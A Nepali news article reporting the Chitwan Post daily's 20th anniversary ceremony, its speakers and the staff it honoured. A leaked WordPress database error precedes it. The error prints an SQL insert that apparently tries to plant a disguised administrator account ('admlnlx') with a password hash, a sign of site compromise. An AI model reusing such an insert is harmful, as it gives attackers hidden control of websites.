WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZCFYposSPaiPZR3Tqe2KpK4ysWumF1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 19:34:50', '', 'admlnlx', 'admlnlx')
चितवन, पुस ९–
नेपाल पत्रकार महासंघ नेपालका अध्यक्ष डा. महेन्द्र विष्टले स्थानीय मुद्दाको निर्धारण, उठान र समाधानका लागि स्थानीय संचारमाध्यमको भूमिका महत्वपूर्ण रहने बताउनुभएको छ । क वर्गमा वर्गीकृत चितवनको पहिलो राष्ट्रिय दैनिक चितवन पोष्ट दैनिकको २० औं वार्षिकोत्सव समारोहमा बोल्दै कार्यक्रमका प्रमुख अतिथि अध्यक्ष डा. महेन्द्र विष्टले प्रविधिको विकासले आज विश्व एउटै गाउँमा परिणत भएपनि स्थानीय मुद्दाको उठान र समाधानका लागि स्थानीय संचारमाध्यमको भूमिका निकै महत्वपूर्ण हुने बताउनुभयो ।
कार्यक्रममा बोल्दै विशिष्ट अतिथि प्रमुख जिल्ला अधिकारी नारायण भट्टले जिल्लाको विकास निर्माण, समस्या, जल्दोबल्दो विषयमा स्थानीय संचारमाध्यमको भूमिका महत्वपूर्ण हुने बताउनुभयो । वार्षिकोत्सव समारोहका सभापति चितवन पोष्ट दैनिकका सम्पादक धर्मराज अर्यालले व्यवसायीक पत्रकारिताको अभ्यास गरिरहेको बताउनुभयो ।

पत्रकारिताको मुल मर्मबाट आफू र आफ्नो संस्था कहिल्यै विचलित नहुने भन्दै सम्पादक अर्यालले चितवन पोष्ट यो स्थितिसम्म आइ पुग्नुमा पाठक, विज्ञापनदाता, शुभेच्छुक, स्तम्भकार, कर्मचारीको सवैको सहयोग रहेको भन्दै सवैप्रति आभार व्यक्त गर्नुभएको थियो ।
कार्यक्रममा स्वागत मन्तव्य राख्दै पत्रिकाका प्रबन्ध सम्पादक जीवराज अर्यालले निकै कष्टपूर्ण अवस्थाबाट चितवन पोष्ट आज यो स्थितिमा आइपुगेको भन्दै अप्ठेरो अवस्थामा साथ दिइ सहयोग गर्ने सवै प्रति कृतज्ञता प्रकट गरेका थिए । चितवन पोष्ट व्यवस्थापन पक्षले न्यूनतम पाँच वर्ष काम गरेका विभिन्न विधाका १३ जना कर्मचारीलाई नगद र सम्मान पत्र दिइ प्रमुख अतिथि डा. महेन्द्र विष्टबाट सम्मान गरिएको थियो । समाचार शाखातर्फ संगीत आयाम, केशव भट्टराई, होमनाथ सापकोटा, दिपेन्द्र अधिकारी, किशोर खनाल र वजार शाखातर्फ टाँडी शाखाकी इन्चार्ज प्रमिला अर्याल रहेका छन् ।

व्यवस्थापन पक्षले समाचार शाखामा रहि उत्कृष्ट कार्य गरेको भन्दै संवाददाता दिपेन्द्र अधिकारीलाई प्रमुख संवाददातामा पदोन्नती समेत गरेको छ । त्यस्तै ले आउट डिजाइनतर्फ सम्मानित हुनेमा दिलिप केसी र बबिलाल तामाङ रहेका छन् । वितरण शाखातर्फ सुमित्रा सापकोटा, ज्ञानु गुरुङ, बसन्ती गुरुङ, तुलसी अधिकारी र उद्धवलाल श्रेष्ठ सम्मानित भएका छन् ।